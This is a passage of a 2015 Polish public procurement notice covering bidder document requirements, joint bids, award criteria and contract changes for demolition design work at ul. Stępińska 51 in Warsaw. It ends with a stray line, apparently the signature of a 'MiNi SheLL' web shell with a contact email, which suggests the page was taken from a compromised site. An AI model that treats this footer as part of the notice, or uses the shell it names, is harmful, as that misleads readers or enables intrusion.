                          kosztorysowych na n wykonanie dokumentacji projektowej i 
                          kosztorysowej na rozbiórkę hali garażowej z pochylnią przy ul. 
                          Stępińskiej 51 w Warszawie a załączniku nr 1 do wzoru formularza 
                          oferty,
3.1.7.  zobowiązanie do wniesienia zabezpieczenia należytego wykonania umowy na załączniku nr 2 do oferty wg wzoru załączonego do wzoru formularza oferty, 
  3.1.8.	oświadczenie na załączniku nr 6 do oferty wg wzoru załączonego do wzoru formularza oferty, iż po upływie terminu ważności będzie odnawiać ubezpieczenie na kwotę nie niższą niż równowartość 30.000 złotych polskich na czas obejmujący wykonanie przedmiotu zamówienia oraz, że przedłoży Zamawiającemu do wglądu oryginał odnowionego ubezpieczenia w terminie 7 dni kalendarzowych od daty jego zawarcia, jednakże nie później niż w dniu podpisania umowy w przypadku gdy 
                dotychczasowe ubezpieczenie wygasa po terminie składania ofert, 
             3.1.9.   informacji określonej w pkt. 18.1.1. niniejszej specyfikacji w przypadku    
                           zastosowania  przez wykonawcę innej niż (23 %) stawki podatku od   
                           towarów i usług, obowiązującej w dacie składania ofert.

    3.2. W celu wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu, o których mowa w pkt. 8 SIWZ, Wykonawca zobowiązany jest złożyć wraz z ofertą następujące dokumenty: 
             3.2.1. oświadczenie na załączniku nr 3 do oferty wg wzoru załączonego do 
                         wzoru formularza oferty, że spełnia warunki określone w art. 22 ust.1
                         ustawy Prawo zamówień publicznych, 
3.2.2. 	wykaz głównych usług, wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich 3-ch lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat  wykonania i podmiotów na rzecz których usługi zostały wykonane, potwierdzający spełnienie warunku określonego w pkt. 8.1.1. niniejszej specyfikacji na załączniku nr 4 do oferty wg wzoru załączonego do wzoru formularza oferty, 
3.2.3. 	wykaz osób które będą uczestniczyć w wykonaniu zamówienia, potwierdzający spełnienie warunku określonego w pkt. 8.1.2. specyfikacji na załączniku nr 5 do oferty wg wzoru załączonego do wzoru formularza oferty,
3.2.4. opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 30.000 PLN.
3.2.5. dowody dotyczące usług, określające czy usługi te, (wykazane przez Wykonawcę w załączniku nr 4 do oferty, zgodnie z zapisem pkt. 8.1.1. i 9.2.2. specyfikacji istotnych warunków zamówienia) zostały wykonane lub są wykonywane należycie. Dowodami, o których mowa w zdaniu poprzednim są: 
              a)poświadczenie, z tym, że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
 b)oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o których mowa w pkt. a),
 W przypadku gdy Wykonawca wskazuje w wykazie usług usługi, które wcześniej zostały wykonane na rzecz Zamawiającego, nie ma obowiązku przedkładania ww dowodów.
3.2.6. W przypadku gdy Wykonawca polegać będzie na doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu (w oryginale): 
            3.2.6.1.  pisemne zobowiązanie tych podmiotów do zrealizowania części zamówienia zawierające zakres robót, które te podmioty zobowiązują się wykonać i konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.)- w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów zakresie realizacji części zamówienia.
            3.2.6.2.   pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób, które będą uczestniczyć w realizacji zamówienia, zawierające także imienną listę tych osób - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na osobach zdolnych do wykonani zamówienia innych podmiotów.
           3.2.6.3.   inne dokumenty i oświadczenia, zgodnie z wymogiem pkt. 8.2.
                             SIWZ.
                       
   3.3. 	W celu wykazania braku podstaw do wykluczenia z postępowania  o 
             udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w  
             art. 24 ust. 1 ustawy, Wykonawca zobowiązany jest złożyć wraz z ofertą:
3.3.1. 	oświadczenie na załączniku nr 7 do oferty wg wzoru załączonego do wzoru formularza oferty o braku podstaw wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Prawo Zamówień Publicznych,  
3.3.2. 	aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, 
3.3.3.  Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w pkt. 8 SIWZ, polega na zasobach innych podmiotów na zasadach określonych w pkt. 8.2. SIWZ, a podmioty te będą brały udział w realizacji części zamówienia, Wykonawca zobowiązany jest załączyć dokumenty wymienione w pkt. 9.2.6. i 9.3 i-lub 9.7. SIWZ, odnoszące się do tych podmiotów.
   3.4.  W celu wykazania braku podstaw do wykluczenia z postępowania  o   
             udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w  
             art. 24 ust. 2 pkt. 5  ustawy, Wykonawca zobowiązany jest złożyć wraz z 
             ofertą listę podmiotów należących do tej samej grupy kapitałowej, o której mowa 
             w art. 24 ust. 2 pkt. 5 ustawy pzp lub informację o braku przynależności do grupy 
             kapitałowej - wzór druku stanowi załącznik nr 8 do oferty wg wzoru 
             załączonego do wzoru formularza oferty.

   3.5.   W celu potwierdzenia że oferowane usługi odpowiadają wymaganiom   
              określonym przez Zamawiającego  w SIWZ; 
              Zamawiający nie wymaga złożenia dokumentów na potwierdzenie, że oferowane 
              usługi  odpowiadają wymaganiom określonym przez Zamawiającego. Za 
              spełnienie tego warunku uzna złożenie oświadczenia, o którym mowa w pkt 
              9.2.1. SIWZ i wypełnienie formularza oferty.

   3.6. Oferta wspólna
    3.6.1. Zamawiający dopuszcza możliwość składania oferty przez dwóch lub więcej   
                 Wykonawców (w ramach oferty wspólnej w rozumieniu art. 23 Ustawy) 
                 pod warunkiem, że żaden z Wykonawców wspólnie ubiegających się o 
                 udzielenie zamówienia nie podlega wykluczeniu na podstawie art. 24 ust. 1 
                 i 24 ust. 2 pkt. 5 ustawy Pzp, a taka oferta spełniać będzie następujące 
                 wymagania: 
                 3.6.1.1.	Wykonawcy występujący wspólnie są zobowiązani do 
                                ustanowienia Pełnomocnika do reprezentowania ich w 
                                postępowaniu albo do reprezentowania ich w postępowaniu i 
                                zawarcia umowy w sprawie przedmiotowego zamówienia 
                                publicznego;
3.6.1.2. 	Oryginał pełnomocnictwa lub kopia poświadczona za zgodność z oryginałem przez notariusza lub inny dokument (np. Umowa konsorcjum, spółki cywilnej) powinien być załączony do oferty i zawierać w szczególności wskazanie: 
a)  postępowania o zamówienie publiczne, którego dotyczy;
b)	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby;
c)  ustanowionego Pełnomocnika oraz zakres jego umocowania;
3.6.1.3.	Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców. 
3.6.1.4. Każdy z Wykonawców (każdy członek konsorcjum)  składających ofertę  wspólną musi wykazać brak podstaw do wykluczenia z powodu niespełnienia warunków określonych w art. 24 ust. 1 i 24 ust. 2 pkt. 5 ustawy pzp. W tym celu konsorcjum składa oświadczenie, o którym mowa w pkt. 9.3.1. i 9.4. siwz podpisane przez wszystkich Wykonawców oraz dokumenty określone w pkt. 9.2.4. i-lub 9.7.1., 9.7.2. siwz  dla wszystkich Wykonawców podpisane za zgodność z oryginałem przez Wykonawców.
3.6.1.5. W odniesieniu do warunków określonych w art. 22 ust. 1 ustawy 
wymagania te muszą być spełnione wspólnie przez Wykonawców składających ofertę wspólną (na ich potwierdzenie należy złożyć dokumenty określone w pkt. 9.2. siwz)  z zastrzeżeniem, że oświadczenie, o którym mowa w pkt. 9.2.1. siwz podpisane przez Pełnomocnika lub wszystkich Wykonawców musi być złożone w imieniu wszystkich  Wykonawców;

     3.6.2. 	Wszelka korespondencja prowadzona będzie przez Zamawiającego  
                  wyłącznie z Pełnomocnikiem, którego adres należy wpisać w formularzu 
                  oferty.

     3.6.3. Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, 
                 Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia 
                 publicznego, umowy regulującej współpracę tych Wykonawców.

             3.6.4. W przypadku złożenia oferty wspólnej Wykonawcy solidarnie odpowiadać 
                         będą za wykonanie zamówienia.

     3.7. Dotyczy Wykonawców mających siedzibę lub miejsce zamieszkania poza 
              terytorium Rzeczypospolitej Polskiej.
             3.7.1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 
                         Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt.  
                         9.3.2. niniejszej specyfikacji - składa dokument lub dokumenty wystawione 
  w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające  
                          odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
                   Dokumenty, o których mowa w pkt. 9.7.1. SIWZ powinny być wystawione 
                   nie   wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
             3.7.2. 	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca   
                           ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o 
                           których mowa w pkt. 9.7.1., zastępuje się je dokumentem zawierającym 
                           oświadczenie, w którym określa się także osoby uprawnione do 
                           reprezentacji Wykonawcy,  złożone przed notariuszem, właściwym 
                           organem sądowym, administracyjnym albo organem samorządu 
                           zawodowego lub gospodarczego odpowiednio miejsca zamieszkania 
                           osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce 
                           zamieszkania. Zapisy pkt. 9.7.1 SIWZ odnoszące się do wymaganych 
                           terminów ważności poszczególnych dokumentów stosuje się 
                           odpowiednio. jw.
            3.7.3.  W przypadku Wykonawców mających siedzibę lub miejsce zamieszkania  
                         poza terytorium Rzeczypospolitej Polskiej wszystkie wykazywane przez 
                         nich w załącznikach do oferty częściowej i dokumentach wartości i kwoty  
                        w EURO będą przeliczane przez Zamawiającego wg średniego kursu NBP na 
                        dzień upublicznienia postępowania.

     3.8. W PRZYPADKU, GDY WYKONAWCA W MIEJSCE KTÓREGOŚ Z DOKUMENTÓW, 
   O KTÓRYCH MOWA W PKT 9.2.4., 9.2.5., 9.3.2.., 9.7.1.., 9.7.2., NINIEJSZEJ 
              SPECYFIKACJI DOSTARCZY JEGO KOPIĘ, KOPIA TA MUSI BYĆ POŚWIADCZONA 
              ZA ZGODNOŚĆ Z ORYGINAŁEM zgodnie z zapisem pkt. 14.6.4 specyfikacji 
              istotnych warunków zamówienia przy czym w przypadku Wykonawców 
              wspólnie ubiegających się o udzielenie zamówienia, zgodnie z zapisem pkt. 
              14.6.5. siwz  Zamawiający może zażądać przedstawienia oryginałów lub 
              notarialnie potwierdzonych kopii dokumentów np., gdy złożone  kopie
              dokumentów będą nieczytelne lub będą budzić wątpliwości co do ich 
              prawdziwości.

     3.9. Postępowanie o udzielenie zamówienia prowadzi się w języku polskim. 
              Dokumenty i oświadczenia sporządzone w języku obcym, są składane wraz z 
              tłumaczeniem  na język polski.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - skrócenie czasu realizacji zamówienia - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający zastrzega sobie możliwość wprowadzenia zmian postanowień 
                     umowy o ile  warunkiem wprowadzenia takich zmian będą między innymi 
                     okoliczności, których nie można było przewidzieć w chwili zawarcia umowy 
                      lub zmiany te będą korzystne dla Zamawiającego. Zamawiający dopuszcza 
                      możliwość zmiany umowy w szczególności w następujących przypadkach:
        a) zmiany regulacji prawnych wprowadzonych w życie po dacie zawarcia    
        umowy          wraz ze skutkami takiej zmiany regulacji prawnych;
        b) ograniczenia środków budżetowych na realizację Przedmiotu 
        umowy;
        c) zmiany zakresu rzeczowego i finansowego;
                     d)  zmiany osób uczestniczących w realizacji Przedmiotu umowy;
               e) powierzenia Podwykonawcy wykonania części lub całości przedmiotu 
               zamówienia lub zmiany Podwykonawców w sytuacji, gdy z przyczyn, których 
               nie można było przewidzieć w chwili zawarcia umowy z Podwykonawcą, 
               koniecznym będzie dla prawidłowego wykonania umowy posłużenie się 
               przez Wykonawcę nowym Podwykonawcą, który będzie realizował część lub 
               cały zakres powierzony uprzednio innym Podwykonawcom. Jeżeli zmiana 
               albo rezygnacja z Podwykonawcy dotyczy podmiotu, na którego zasoby
               Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b
               Ustawy pzp, w celu wykazania spełniania warunków udziału w 
               postępowaniu, o których mowa w art. 22 ust. 1 ustawy pzp, Wykonawca jest 
               obowiązany wykazać Zamawiającemu, iż proponowany inny Podwykonawca 
               lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż 
               wymagany w trakcie postępowania o udzielenie zamówienia będącego 
               przedmiotem zamówienia;
                      f)zmiany terminu realizacji przedmiotu umowy w następstwie 
                      wydłużających-wykraczających poza ustawowe terminy procedur 
                      administracyjnych oraz innych terminów spraw urzędowych, mających 
                      wpływ na termin realizacji przedmiotu umowy.
      2. Zmiana umowy wymaga sporządzenia aneksu w formie pisemnej pod 
                     rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgnmokotow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarowania Nieruchomościami w Dzielnicy Mokotów m. st. Warszawy ul. Irysowa 19 02-660 Warszawa Dział Zamówień Publicznych pok. nr 34.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2015 godzina 10:00, miejsce: Zakład Gospodarowania Nieruchomościami w Dzielnicy Mokotów m. st. Warszawy ul. Irysowa 19 02-660 Warszawa pok. nr 21 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com